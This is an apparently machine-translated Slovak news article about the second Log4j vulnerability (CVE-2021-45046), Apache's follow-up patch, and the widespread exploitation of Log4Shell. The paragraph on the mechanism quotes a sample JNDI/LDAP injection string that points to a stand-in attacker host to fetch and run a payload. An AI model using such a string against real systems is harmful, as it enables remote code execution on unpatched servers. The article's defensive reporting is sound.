Objavená druhá chyba zabezpečenia Log4j (CVE-2021-45046) — vydaná nová oprava

AKTUALIZÁCIA — Skóre závažnosti CVE-2021-45046, pôvodne klasifikované ako chyba DoS, bolo odvtedy revidované od 3.7 do 9.0, aby odrážali skutočnosť, že útočník by mohol zneužiť túto zraniteľnosť na odoslanie špeciálne vytvoreného reťazca, ktorý vedie k „úniku informácií a vzdialenému spusteniu kódu v niektorých prostrediach a spusteniu lokálneho kódu vo všetkých prostrediach“.

Softvérová nadácia Apache (ASF) po predchádzajúcej oprave pre nedávno zverejnenú pomôcku na protokolovanie Log4j vydala novú opravu Log4Shell exploit bol považovaný za “neúplný v určitých nepredvolených konfiguráciách.”

Druhá zraniteľnosť – sledovaná ako CVE-2021-45046 – je hodnotená 3.7 z maximálne 10 v systéme hodnotenia CVSS a ovplyvňuje všetky verzie Log4j od 2.0-beta9 cez 2.12.1 a 2.13.0 cez 2.15.0, ktorý správcovia projektu odoslali minulý týždeň, aby riešili kritickú zraniteľnosť spustenia vzdialeného kódu (CVE-2021-44228), ktorá by mohla byť zneužitá na infiltráciu a ovládnutie systémov.

Neúplná oprava pre CVE-2021-44228 by mohla byť zneužitá na „vytvorenie škodlivých vstupných údajov pomocou vzoru vyhľadávania JNDI, čo by malo za následok útok odmietnutia služby (DoS),“ uviedla ASF v novom odporúčaní. Najnovšia verzia Log4j, 2.16.0 (pre používateľov vyžadujúcich Java 8 alebo novšie), všetko okrem toho odstraňuje podporu pre vyhľadávanie správ a predvolene deaktivuje JNDI, komponent, ktorý je jadrom zraniteľnosti. Používatelia vyžadujúci Javu 7 sa odporúča inovovať na vydanie Log4j 2.12.2 keď bude k dispozícii.

„Zaobchádzanie s CVE-2021-44228 ukázalo, že JNDI má závažné bezpečnostné problémy,“ vysvetlil Ralph Goers z ASF. „Aj keď sme zmiernili to, o čom sme si vedomí, pre používateľov by bolo bezpečnejšie ho predvolene úplne zakázať, najmä preto, že veľká väčšina ho pravdepodobne nebude používať.“

JNDI, skratka pre Java Naming and Directory Interface, je Java API, ktoré umožňuje aplikáciám kódovaným v programovacom jazyku vyhľadávať údaje a zdroje, ako sú servery LDAP. Log4Shell sa nachádza v knižnici Log4j, open source protokolovom rámci založenom na jazyku Java, ktorý je bežne súčasťou webových serverov Apache.

Samotný problém nastáva, keď sa komponent JNDI konektora LDAP využíva na vloženie škodlivej požiadavky LDAP – niečo ako „${jndi:ldap://attacker_controled_website/payload_to_be_executed}“, ktorá sa pri prihlásení na webový server so zraniteľnou verziou knižnice, umožňuje protivníkovi získať užitočné zaťaženie zo vzdialenej domény a spustiť ho lokálne.

Najnovšia aktualizácia prichádza v čase, keď výpadok chyby viedol k „skutočnej kybernetickej pandémii“, pričom niekoľko aktérov hrozieb zachytilo Log4Shell spôsobmi, ktoré položili základy pre ďalšie útoky, vrátane nasadenia mincovníkov, trójskych koní na diaľku a ransomvéru na citlivých stroje. Oportunistické prieniky vraj začali minimálne od decembra 1, hoci chyba sa stala všeobecne známou v decembri 9.

Bezpečnostná chyba vyvolala všeobecný poplach, pretože existuje v takmer všade používanom protokolovom rámci v aplikáciách Java, čo predstavuje zlým aktérom bezprecedentnú bránu na prienik a kompromitáciu miliónov zariadení na celom svete.

Na diaľku zneužiteľná chyba má vplyv aj na stovky veľkých podnikových produktov od mnohých spoločností, ako je Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler a Zoho, čo predstavuje významné riziko dodávateľského reťazca softvéru.

“Na rozdiel od iných veľkých kybernetických útokov, ktoré zahŕňajú jeden alebo obmedzený počet softvéru, Log4j je v podstate zabudovaný do každého produktu alebo webovej služby založenej na jazyku Java. Je veľmi ťažké ho manuálne napraviť,” uviedla izraelská bezpečnostná spoločnosť Check Point. „Zdá sa, že táto zraniteľnosť z dôvodu zložitosti jej záplatovania a jednoduchosti zneužitia nám zostane v nasledujúcich rokoch, pokiaľ spoločnosti a služby neprijmú okamžité opatrenia, aby zabránili útokom na ich produkty implementáciou ochrany.“

Počas niekoľkých dní po odhalení chyby sa do rozbehnutého vlaku využívalo najmenej desať rôznych skupín a približne 44 % podnikových sietí na celom svete už bolo napadnutých, čo znamená významnú eskaláciu. Okrem toho zločinecké gangy pôsobiace ako sprostredkovatelia prístupu začali túto zraniteľnosť využívať na získanie počiatočného postavenia v cieľových sieťach a potom predali prístup pridruženým spoločnostiam typu ransomware-as-a-service (RaaS).

Zahŕňa to aj aktérov z národných štátov pochádzajúcich z Číny, Iránu, Severnej Kórey a Turecka, pričom Microsoft poznamenáva, že „aktivita siaha od experimentovania počas vývoja, integrácie zraniteľnosti až po nasadenie vo voľnej prírode a využívanie proti cieľom až po dosiahnuť ciele herca“.

Rozsiahle zbrojenie chyby vzdialeného spustenia kódu podnietilo Americkú agentúru pre kybernetickú bezpečnosť a bezpečnosť (CISA), aby pridala Log4Shell do svojho katalógu známych zneužitých zraniteľností, čím poskytla federálnym agentúram termín do 24. decembra na začlenenie záplat pre túto zraniteľnosť a vyzvala predajcov. na “okamžitú identifikáciu, zmiernenie a opravu postihnutých produktov pomocou Log4j.”

Sean Gallagher, vedúci výskumník hrozieb v spoločnosti Sophos, varoval, že „protivníci pravdepodobne získajú čo najväčší prístup k čomukoľvek, čo môžu získať práve teraz, s cieľom speňažiť a/alebo zarobiť na tom neskôr,“ dodal „pred tým je pokoj. búrka, pokiaľ ide o hanebnú aktivitu zo zraniteľnosti Log4Shell.”

“Najbližšou prioritou pre obrancov je znížiť vystavenie riziku opravou a zmiernením všetkých kútov ich infraštruktúry a preskúmaním odhalených a potenciálne ohrozených systémov. Táto zraniteľnosť môže byť všade,” dodal Gallagher.